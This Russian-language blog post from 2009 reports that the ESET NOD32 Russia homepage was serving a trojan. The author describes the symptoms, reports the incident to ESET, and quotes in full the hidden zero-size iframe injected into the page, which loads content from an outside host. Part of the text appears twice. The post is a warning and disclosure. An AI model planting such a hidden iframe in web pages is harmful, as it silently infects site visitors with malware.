Вчера, 19.11.2009, зайдя на главную страницу сайта ESET NOD32 Russia (ахтунг! не уверен — не ходи!), был неприятно удивлен: неожиданно открылся какой-то левый pdf-файл, после чего Comodo Firewall сообщил, что браузер Opera пытается запустить файл wJQs.exe
UPD: Перенес в блог вирусы (и антивирусы)
UPD2: вроде как пофиксили
Посмотрел в код страницы. Так и есть, iframe:
Отписал на официальном форуме, отправил семпл вируса. К вечеру вирус был опознан и добавлен в базы сигнатур, за что большое спасибо сотрудникам лаборатории ESET и участникам форума. Однако, администраторы сайта не спешат убирать трояна с главной страницы. Поэтому, заходя в эти дни на сайт NOD32, будьте бдительны!
UPD: Перенес в блог вирусы (и антивирусы)
UPD2: вроде как пофиксили
Посмотрел в код страницы. Так и есть, iframe:
<iframe pcvsn='j6Av392D' src='http://newiframe.com/s/in.cgi?6 ' xvnil='BwpbaJm1' width='0' height='0' style='display:none'></iframe>Отписал на официальном форуме, отправил семпл вируса. К вечеру вирус был опознан и добавлен в базы сигнатур, за что большое спасибо сотрудникам лаборатории ESET и участникам форума. Однако, администраторы сайта не спешат убирать трояна с главной страницы. Поэтому, заходя в эти дни на сайт NOD32, будьте бдительны!